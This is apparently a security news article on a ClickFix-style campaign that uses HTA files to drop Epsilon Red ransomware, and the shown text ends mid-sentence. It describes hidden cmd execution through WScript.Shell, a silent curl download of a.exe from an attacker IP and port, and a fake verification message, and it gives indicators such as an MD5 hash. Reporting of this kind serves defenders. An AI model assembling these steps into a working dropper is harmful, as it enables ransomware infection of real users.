Hackers Use Weaponized .HTA Files to Infect Victims with Red Ransomware

CloudSEK’s TRIAD team uncovered an active development site deploying Clickfix-themed malware linked to the Epsilon Red ransomware.

This variant deviates from traditional clipboard-based command injection tactics by directing victims to a secondary page on the same domain, where malicious shell commands are executed silently through ActiveXObject(“WScript.Shell”) to facilitate payload delivery.

The script leverages Windows Command Shell (cmd.exe) for hidden execution, switching to the user’s home directory with “cd /D %userprofile%”, followed by a silent curl command to download a binary from an attacker-controlled IP (155.94.155.227:2269) and save it as a.exe, which is then run invisibly with the parameter ‘0’ to suppress any window.

This culminates in the deployment of Epsilon Red ransomware, identified by its MD5 hash 98107c01ecd8b7802582d404e007e493.

Advanced Clickfix Malware Campaign

To enhance deception, the script displays a fake verification message via “echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && ...